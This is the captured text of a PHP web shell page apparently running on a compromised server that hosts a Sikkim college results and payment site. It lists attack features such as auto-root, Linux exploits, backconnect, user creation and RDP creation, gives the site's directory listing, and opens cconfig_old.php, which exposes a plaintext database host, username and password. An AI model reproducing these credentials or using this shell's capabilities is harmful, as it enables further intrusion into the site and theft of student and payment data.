Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.191.176.192
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sikkim /
adm /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
college
[ DIR ]
drwxrwxr-x
css
[ DIR ]
drwxr-xr-x
custom_js
[ DIR ]
drwxr-xr-x
custom_src
[ DIR ]
drwxr-xr-x
departments
[ DIR ]
drwxrwxr-x
hdfc
[ DIR ]
drwxr-xr-x
hdfc_test
[ DIR ]
drwxr-xr-x
html_modules
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
links
[ DIR ]
drwxr-xr-x
pgclg
[ DIR ]
drwxrwxr-x
src
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tcpdf
[ DIR ]
drwxr-xr-x
tmpphotos
[ DIR ]
drwxrwxrwx
AdminMainPage.php
2.18
KB
-rwxr-xr-x
CollegeMainPage.php
2.18
KB
-rwxr-xr-x
admin_login.php
6.46
KB
-rwxr-xr-x
app.php
411
B
-rwxr-xr-x
body_test.html
9.16
KB
-rwxr-xr-x
cconfig.php
1.16
KB
-rwxr-xr-x
cconfig_old.php
1.11
KB
-rwxr-xr-x
college_login.php
7.2
KB
-rwxr-xr-x
cronjob_sendsms.php
4.82
KB
-rwxr-xr-x
home.html
31.3
KB
-rwxr-xr-x
home_admin.html
4.53
KB
-rwxr-xr-x
home_college.html
6.17
KB
-rwxr-xr-x
index_bf_saparate_link.html
11.29
KB
-rwxr-xr-x
indexpage.php
2.09
KB
-rwxr-xr-x
payment_gate_way_responce.php
2.46
KB
-rwxr-xr-x
payment_gateway.php
7.96
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cconfig_old.php
<?php define("APP_LANDPAGE_G","app.php"); define("APP_PATH_G", dirname($_SERVER["SCRIPT_FILENAME"])); define("APP_SRC_G", APP_PATH_G . "/src"); define("APP_LIB_G", APP_PATH_G . "/libs"); define("APP_DB_G", APP_LIB_G . "/adodb5"); class CConfig { public $mstr_host; public $mstr_user; public $mstr_password; public $mstr_db; public $mbool_debug; function __construct($abool_debug = false) { $this->mstr_host = "72.167.46.92"; $this->mstr_user = "sikkimuser"; $this->mstr_password = "sikkimmikkis"; $this->mstr_db = "resultsg_sikkim"; $this->mbool_debug = $abool_debug; ini_set("magic_quotes_gpc", 0); } static function GetSystemDate($aobj_context) { $get_date="select date_add(date_add(now(),INTERVAL 13 hour),interval 30 minute) as now_date"; $obj=$aobj_context->mobj_db->GetRow($get_date); return $obj[now_date]; } static function CreateNewDbContext() { require_once("src/customappcontext.php"); $live_aobj_context=new LiveContext(); $live_aobj_context->Initialize(); $live_aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); return $live_aobj_context; } } ?>
Close